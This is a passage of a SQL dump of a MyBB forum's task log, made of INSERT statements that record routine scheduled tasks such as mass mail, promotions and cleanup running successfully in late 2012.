INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14324', '5', '1351848119', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14323', '7', '1351847161', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14322', '1', '1351846969', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14321', '3', '1351846945', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14320', '9', '1351846933', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14319', '5', '1351846846', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14318', '9', '1351846193', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14317', '3', '1351846028', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14316', '9', '1351845328', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14315', '5', '1351845307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14314', '5', '1351843919', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14313', '7', '1351843914', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14312', '1', '1351843911', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14311', '3', '1351843909', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14310', '9', '1351843900', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14309', '5', '1351842329', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14308', '3', '1351842311', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14307', '9', '1351842171', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14306', '5', '1351842149', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14305', '7', '1351841961', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14304', '1', '1351841422', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14303', '3', '1351841303', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14302', '5', '1351840888', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14301', '9', '1351840803', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14300', '3', '1351837930', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14299', '9', '1351837541', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14298', '5', '1351837524', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14297', '9', '1351836698', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14296', '5', '1351836529', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14295', '7', '1351836045', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14294', '1', '1351836031', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14293', '3', '1351835945', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14292', '9', '1351835843', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14291', '5', '1351835138', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14290', '9', '1351835119', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14289', '3', '1351834257', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14288', '9', '1351833958', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14287', '5', '1351833922', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14286', '9', '1351833007', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14285', '5', '1351832976', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14284', '7', '1351832869', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14283', '1', '1351832842', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14282', '3', '1351832833', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14281', '9', '1351832825', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14280', '5', '1351831524', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14279', '3', '1351831482', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14278', '5', '1351831479', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14277', '9', '1351831465', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14276', '5', '1351829404', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14275', '7', '1351828852', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14274', '1', '1351828823', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14273', '3', '1351828821', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14272', '5', '1351828631', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14271', '9', '1351828584', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14270', '3', '1351827029', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14269', '5', '1351827007', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14268', '7', '1351827004', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14267', '1', '1351826979', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14266', '3', '1351826975', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14265', '9', '1351826970', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14264', '5', '1351825125', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14263', '9', '1351824188', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14262', '3', '1351823599', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14261', '9', '1351823134', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14260', '5', '1351823119', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14259', '7', '1351822759', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14258', '1', '1351822731', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14257', '3', '1351822730', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14256', '9', '1351822722', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14255', '5', '1351822705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14254', '9', '1351820735', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14253', '3', '1351819935', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14252', '9', '1351819874', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14251', '5', '1351819791', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14250', '9', '1351819195', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14249', '5', '1351818560', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14248', '7', '1351818148', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14247', '1', '1351818140', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14246', '3', '1351818130', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14245', '9', '1351817741', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14244', '5', '1351817503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14243', '9', '1351817499', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14242', '3', '1351817488', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14241', '9', '1351815947', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14240', '7', '1351815943', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14239', '5', '1351815943', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14238', '2', '1351815943', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14237', '1', '1351815141', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14236', '3', '1351814551', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14235', '5', '1351814272', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14234', '9', '1351814270', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14233', '3', '1351812626', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14232', '9', '1351812599', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14231', '5', '1351812345', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14230', '9', '1351812070', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14229', '5', '1351811346', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14228', '7', '1351811330', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14227', '1', '1351811198', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14226', '3', '1351810780', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14225', '9', '1351810702', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14224', '5', '1351810061', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14223', '9', '1351810051', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14222', '3', '1351809085', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14221', '9', '1351808719', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14220', '5', '1351808708', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14219', '9', '1351808283', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14218', '5', '1351808171', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14217', '7', '1351807208', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14216', '1', '1351807204', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14215', '3', '1351807142', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14214', '9', '1351807044', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14213', '5', '1351806315', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14212', '9', '1351806253', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14211', '3', '1351805580', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14210', '9', '1351805230', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14209', '5', '1351805210', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14208', '9', '1351804319', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14207', '5', '1351804270', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14206', '7', '1351804144', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14205', '1', '1351803617', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14204', '3', '1351803610', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14203', '9', '1351803602', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14202', '5', '1351803581', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14201', '9', '1351802432', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14200', '3', '1351802006', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14199', '5', '1351801851', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14198', '9', '1351801831', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14197', '5', '1351800316', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14196', '7', '1351800018', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14195', '1', '1351800011', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14194', '3', '1351799994', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14193', '9', '1351799736', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14192', '5', '1351799114', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14191', '9', '1351798854', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14190', '3', '1351798250', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14189', '9', '1351798235', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14188', '5', '1351798217', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14187', '9', '1351797036', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14186', '5', '1351796825', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14185', '7', '1351796817', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14184', '1', '1351796727', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14183', '3', '1351796432', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14182', '9', '1351796425', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14181', '5', '1351795591', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14180', '9', '1351795427', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14179', '3', '1351794854', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14178', '9', '1351794383', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14177', '5', '1351794354', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14176', '9', '1351793415', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14175', '5', '1351793128', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14174', '7', '1351792833', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14173', '1', '1351792830', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14172', '3', '1351792744', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14171', '9', '1351792509', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14170', '5', '1351791918', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14169', '9', '1351791654', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14168', '3', '1351791021', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14167', '9', '1351790872', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14166', '5', '1351790864', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14165', '9', '1351789831', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14164', '5', '1351789706', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14163', '7', '1351789696', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14162', '1', '1351789681', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14161', '3', '1351789675', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14160', '9', '1351789675', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14159', '9', '1351788422', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14158', '5', '1351788404', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14157', '7', '1351788396', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14156', '1', '1351788389', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14155', '3', '1351788305', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14154', '9', '1351786749', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14153', '5', '1351785093', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14152', '9', '1351784644', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14151', '3', '1351783969', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14150', '9', '1351783947', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14149', '5', '1351783929', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14148', '9', '1351782802', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14147', '5', '1351782321', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14146', '7', '1351782073', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14145', '1', '1351782034', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14144', '3', '1351781981', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14143', '9', '1351781916', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14142', '5', '1351781274', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14141', '9', '1351780923', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14140', '3', '1351780411', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14139', '9', '1351779993', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14138', '5', '1351779931', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14137', '9', '1351779045', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14136', '5', '1351778966', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14135', '7', '1351778964', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14134', '1', '1351778957', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14133', '3', '1351778956', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14132', '5', '1351778459', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14131', '9', '1351778451', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14130', '3', '1351776769', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14129', '9', '1351776478', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14128', '5', '1351776464', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14127', '9', '1351775405', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14126', '5', '1351775169', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14125', '7', '1351774932', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14124', '1', '1351774909', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14123', '3', '1351774795', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14122', '9', '1351774529', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14121', '5', '1351774403', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14120', '9', '1351774280', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, 